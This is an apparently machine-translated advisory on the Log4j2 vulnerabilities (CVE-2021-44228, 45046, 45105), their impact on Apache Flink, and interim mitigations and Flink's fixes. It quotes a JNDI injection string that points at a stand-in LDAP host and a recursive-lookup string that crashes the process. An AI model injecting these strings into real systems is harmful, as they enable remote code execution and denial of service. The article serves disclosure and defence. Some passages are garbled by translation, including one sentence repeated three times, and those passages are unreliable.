The authors of this article, Yu Hangxiang & Li Yu, detail the impact of the Log4j2 Zero Day vulnerability and the solutions of the Flink community. The main contents include:

  1. Holes that
  2. Possible impact on Flink users
  3. Affected Flink versions and temporary solutions
  4. Flink Community Restoration Program

An overview of the

Apache Log4j is a Java-based logging tool. Apache Log4j2 rewrites Log4j and adds many rich features. Recently, Ali Cloud Security reported the Zero Day vulnerability of Apache Log4J2 [1], based on which an attacker can construct a malicious request to trigger a remote code execution vulnerability, which is currently tracked by CVE-2021-44228[2]. The Log4j team released version 2.15.0 as soon as it discovered the problem, with a temporary fix.

On December 14, a team from Twitter discovered and reported a new vulnerability issue: CVE-2021-45046[17]. This vulnerability indicates that the fixes to CVE-2021-44228 in 2.15.0 and the proposed interim solution are incomplete and can still be exploited to cause DOS attacks under certain configuration conditions. The Log4j team then released version 2.16.0 and recommended that affected software be upgraded to that version, along with a new interim solution.

The vulnerability affects versions in the 2.0-beta9 <= log4j2 <= 2.12.1 and 2.13.0 <= log4j2 <= 2.15.0. Apache Flink uses Log4j 1.x in versions 1.10 and earlier and can be considered unaffected. Log4j 2.x is used in versions 1.11 and above and is in the affected range.

On December 16, a new vulnerability issue concerning Apache Log4j was raised [18], and after verification, CVE-2021-45105[19] was released on December 18. This vulnerability further indicates that version 2.16.0 and CVE-2021-45046 interim fix are still vulnerable to DOS attacks under certain configuration conditions. The Log4j team immediately released version 2.17.0 with a new interim fix.

The vulnerability affects versions from 2.0-beta9 to 2.16.0.

Next, we will briefly describe the details and impact of the vulnerability, and then specifically describe the possible impact of the vulnerability on Flink users. Finally, we will detail the temporary solutions available to Flink users and the repair plans of the Flink community.

I. Vulnerability description

CVE-2021-44228

The vulnerability can be traced back to a Feature introduced earlier in Log4j. In 2013, Log4j added the “JNDILookup Plugin” [4] feature in version 2.0-Beta9 [3].

Java introduced JNDI as a directory service after 1990, allowing Java programs to look up data through a directory in the form of Java objects. JNDI provides a variety of SPI support for different directory services, such as CORBA COS (Common Object Service), Java RMI (Remote Method Interface) Registry, and LDAP (Lightweight Directory Access Protocol). These are services that could be exploited by the CVE-2021-44228/45046 vulnerability. Java programs can use A combination of JNDI and LDAP to look up Java objects that contain data they might need. For example, there is an example in the standard Java documentation of communicating with an LDAP server to retrieve object properties. This is the URL “ldap://localhost:389/o=JNDITutorial” to find the JNDITutorial object from the LDAP server running on port 389 on the same machine (localhost). And continue to read properties from it. According to the OFFICIAL JNDI help document that says “you need to edit the LDAP URL if your LDAP server is on a different machine or using a different port,” the LDAP server can run on a different machine or anywhere on the Internet. This flexibility means that if attackers can control LDAP urls, they can have Java programs load objects from servers they control.

In the version of Log4j contain bugs, an attacker can by passing in a similar “${jndi:ldap://example.com/a}” in the form of a string to control the Log4j access LDAP URL. In this case, Log4j will connect to the LDAP server on example.com and retrieve the objects.

Log4j has a special syntax for the “prefix:name” form, where prefix is one of the Lookups[5] provided by Log4j, and name corresponds to an execution attribute under this Lookup. For example, the {prefix:name} “form has a special syntax interpretation, where prefix is one of the various Lookups[5] provided by Log4j, and name corresponds to an execution property under the Lookup. For example, the prefix:name “form has a special syntax interpretation, where prefix is one of the various Lookups[5] provided by Log4j, and name corresponds to an execution property under this Lookup. For example, {Java :version} is the currently running Version of Java. JndiLookup added to log4J-313 provides the ability to retrieve variables through JNDI. By default, the key will take the form “Java :comp/env/” as prefix. However, if the key itself contains additional ‘:’, the correct prefix form will not be resolved. Such as a string “${jndi:ldap://example.com/a}” incoming, Log4j will detect the correct prefix, because Message Lookup mechanism, their behavior will become query target objects in the LDAP server.

As a result, the attacker only need to find a may be printed input and add a string of similar “${jndi:ldap://example.com/a}”. For example, an attacker may insert attack strings into HTTP headers like user-Agent or form parameters like username.

This approach is common in Java-based Internet-oriented applications. Even more suffocating, this data can be passed from one system to another, causing non-Internet-oriented applications that use Java to fall victim.

For example, a string from a User-Agent that exploits the vulnerability could be passed to a backend system written in Java, which could build indexes or data analysis based on vulnerability data, which could also be printed by Log4j with significant impact. ** Therefore, all Java-based software developed using Log4j2 should be patched immediately, otherwise the potential threat is high. Even if Internet-oriented software is not written in Java, malicious strings can be passed to other systems written in Java and cause serious problems. ** An example is a Java-based billing system that might print a customer’s name if it cannot be found. An attacker can create an order containing the customer name of the vulnerability information, and the vulnerability information is likely to be passed in the Web server, database system and finally into the billing system, all systems in the link may be affected.

In addition, Java is used in many other scenarios besides Internet-oriented systems. For example, a QR code on a package processing system or an electronic key to a contactless door could be vulnerable if they are written in Java and use Log4j. A carefully crafted QR code may contain a postal address for information about a vulnerability, and a carefully coded electronic key may contain malicious programs that exploit the vulnerability and directly track our comings and comings.

Other systems that contain timed tasks may not process the vulnerability information right away, and the vulnerability may remain dormant until the timed task is summarized and archived to print the malicious string. It can take hours or even days for the bug to trigger and cause serious damage.

CVE-2021-45046

The bug was discovered by Twitter. The 2.15.0 fixes to CVE-2021-44228 and previous recommendations from the Log4j team do not completely prevent this vulnerability. The reason is that when some non-default Pattern layouts (Context Lookup or Thread Context Map Pattern) are used in the log configuration, attackers can use this Pattern to inject malicious data.

If the log configuration of the Pattern Layout, based on “log4j2. FormatMsgNoLookups = true” plan would not prevent malicious data using JndiLookup to trigger the CVE – 2021-44228, Even though 2.15.0 restricted the scope of JNDI LDAP Lookup to Localhost, there is still a DOS attack risk.

CVE-2021-45105

The vulnerability indicates that Log4j version 2.16.0 is still at risk of DOS attacks under fixes and interim solutions based on CVE-2021-45046. $${CTX :loginId} $${CTX :loginId} $${CTX :loginId} An attacker can add malicious data to the Thread Context Map (such as ${${::-${::-$${::-j}}}}) to trigger an infinite loop of Lookup, further terminating the process due to StackOverflowError.

If the above Pattern Layout exists in the log configuration, Based on the “log4j2. FormatMsgNoLookups = true” and “remove JndiLookup. Class” a plan would not prevent malicious data trigger CVE – 2021-45105, Because the root of the vulnerability occurs in the String Substitution process.

Second, Flink users may be affected

Flink versions 1.11 and later are affected by this vulnerability. As mentioned in the previous section, although Flink is not directly internet-facing in most usage scenarios, attack strings may be passed directly into Flink from other systems (even if other systems have taken precautions) and processed by UDFs in Flink. This vulnerability is triggered by record-related printing operations in this process (in fact, such printing operations are common in real applications), which can cause serious damage.

Log analysis of common scenarios, for example, we often meet in the UDF print Record information about the operation, when the attack string (such as ${jndi:ldap://example.com/a}) from Kafka into Flink by these udfs processing, Nodes in the job execution environment are directly affected. On the one hand, similar message passing is not restricted by packet passing encryption and decryption (UDF decodes encrypted messages first when processing them), and on the other hand, it does not require the submission permission of Flink jobs but can be directly injected upstream. Therefore, Flink systems are highly threatened, especially for execution environments that have access to the Internet and lack secure container isolation capabilities.

Iii. Affected Flink versions and interim solutions

The log4J versions used by Flink are as follows:

As you can see, Flink versions 1.11 and above use Log4j 2.x and are therefore affected, while versions 1.10 and below can be considered unaffected. The community has responded positively to fix the problem, and the detailed fix plan will be described in the next section.

Until the community releases a fix, you need to follow the latest recommendations from the Log4j team.

If the community has released a fix for Log4j 2.17.0, users can upgrade to the latest version and stop and restart the job to avoid these vulnerabilities.

If the current Flink version used by the job is the corresponding version of Log4j 2.16.0 (i.e. 1.14.2, 1.13.5, 1.12.7, 1.11.6), there are two solutions:

  1. In the PatternLayout of the log configuration, it will look similar${ctx:loginId} or $${ctx:loginId}Replace the Context Lookup mode with the Thread Context Map mode (e.g%X, %mdc, or %MDC)
  2. Remove the similarity completely in logging configuration${ctx:loginId} or $${ctx:loginId}Context Lookup mode (the core is that this mode can inject malicious data and be resolved by Log4j)

If the job is currently using a version of Flink of Log4j 2.15.0 or earlier (that is, 1.14.1, 1.13.4, 1.12.5, 1.11.4 or earlier), in addition to the above operations, you need to use:

 zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Copy the code

Remove JndiLooup. Class from log4J-core where Flink depends to disable JNDI as in 2.16.0.

Note the following three points:

  1. The repair process requires that the job be stopped and restarted after the repair is complete.
  2. For Apache Log4j’s Zero Day problem, there have been other temporary solutions [6][7], but only the above method can completely avoid the impact of this vulnerability.
  3. You are advised to batch upgrade jobs to the repair version as soon as possible after the repair version is released in the community.

Flink Community Restoration Program

Log4j has been released 2.15.0, 2.16.0, and 2.17.0. The fixes are as follows:

The Flink community immediately discussed the fix plan [14] after learning of this vulnerability. The community first upgraded the version of Log4j in the Master branch to 2.15.0 and picked the fix to 1.14.1, 1.13.4, 1.12.5, 1.11.4[12]. Now this version has been released, the user can use directly, for example: search.maven.org/artifact/or…

However, considering that Log4j version 2.16.0 can solve the problem more thoroughly, the community further upgraded Log4j version in the Master branch to 2.16.0 and picked the fix to 1.14.2, 1.13.5, 1.12.7, 1.11.6[13]. At present, the voting of these new versions has been completed and it is believed that they will be released as soon as possible [14][15][16].

Plans for a fixed version of Log4j 2.17.0 are currently being discussed [20][21]. After the Flink community releases fixes for Log4j 2.17.0, users simply need to upgrade the version of Flink used for their jobs to completely avoid the problem.

reference

[1] Apache Log4j Vulnerability Details and Mitigation

www.cyberkendra.com/2021/12/apa…

[2] CVE-2021-44228

NVD. Nist. Gov/vuln/detail…

[3] Apache Log4j 2.0- Beta9 released

Blogs.apache.org/logging/ent…

[4] LOG4J2-313

Issues.apache.org/jira/browse…

[5] LOG4J Lookups

Logging.apache.org/log4j/2.x/m…

[6] Advise on Apache Log4j Zero Day (CVE-2021-44228)

Flink.apache.org/2021/12/10/…

[7] CVE-2021-44228 Solution

Stackoverflow.com/questions/7…

[8] LOG4J2-3198

Issues.apache.org/jira/browse…

[9] LOG4J2-3201

Issues.apache.org/jira/browse…

[10] LOG4J2-3208

Issues.apache.org/jira/browse…

[11] LOG4J2-3211

Issues.apache.org/jira/browse…

[12] Update log4j2 version to 2.15.0

Issues.apache.org/jira/browse…

[13] Update Log4j to 2.16.0

Issues.apache.org/jira/browse…

[14] [DISCUSS] Immediate dedicated Flink releases for log4j vulnerability

Lists.apache.org/thread/j15t…

[15] [that] Release 1.11.5/1.12.6/1.13.4/1.14.1, Release candidate # 1

Lists.apache.org/thread/64tn…

[16] [that] Release 1.11.6/1.12.7/1.13.5/1.14.2, Release candidate # 1

Lists.apache.org/thread/3yn7…

[17] CVE-2021-45046

NVD. Nist. Gov/vuln/detail…

[18] LOG4J2-3230

Issues.apache.org/jira/browse…

[19] CVE-2021-45105

NVD. Nist. Gov/vuln/detail…

[20] CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation

Lists.apache.org/thread/6gxl…

[21] FLINK-25375

Issues.apache.org/jira/browse…